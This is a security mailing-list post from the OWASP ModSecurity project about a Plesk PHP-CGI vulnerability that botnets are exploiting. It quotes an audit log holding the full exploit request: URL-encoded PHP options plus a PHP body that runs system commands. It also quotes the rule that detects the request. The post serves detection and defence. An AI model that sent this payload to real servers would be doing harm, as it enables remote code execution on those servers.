I wanted to reach out to the community on this issue and ask for some help.
An exploit for Plesk was released last week - http://seclists.org/fulldisclosure/2013/Jun/21 and now there are reports of mass exploits from IRC botnets. Reference this link - http://threatpost.com/irc-botnet-leveraging-unpatched-plesk-vulnerability/ Here is an example ModSecurity audit log of running the plesk-simple.pl script against a host - --c0538227-A-- [10/Jun/2013:16:33:13 --0400] UbY4B8CoAWQAAP3TbGsAAAAC 127.0.0.1 56954 127.0.0.1 80 --c0538227-B-- POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Content-Type: application/x-www-form-urlencoded Content-Length: 82 --c0538227-C-- <?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;"); ?> For those of you running the OWASP ModSecurity CRS – this attac would already be picked up by a number of rules/signatures. For example - Message: Warning. Pattern match "<\\?(?!xml)" at ARGS_NAMES:<?php echo "Content-Type:text/html\\r\\n\\r\\n";echo "OK\\n";system("uname -a;id;"); ?>. [file "/usr/local/apache/conf/crs/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.7"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] I am working on a blog post to highlight this vulnerability and the ModSecurity protections. It would be useful if anyone who has seen these attacks hit their server to send me some example audit log entries as I want to show real-world instances vs only running the PoC. Thanks. -- Ryan Barnett Trustwave SpiderLabs ModSecurity Project Leader OWASP ModSecurity CRS Project Leader ________________________________ This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
_______________________________________________ Owasp-modsecurity-core-rule-set mailing list Owasp-modsecurity-core-rule-set@lists.owasp.org https://lists.owasp.org/mailman/listinfo/owasp-modsecurity-core-rule-set
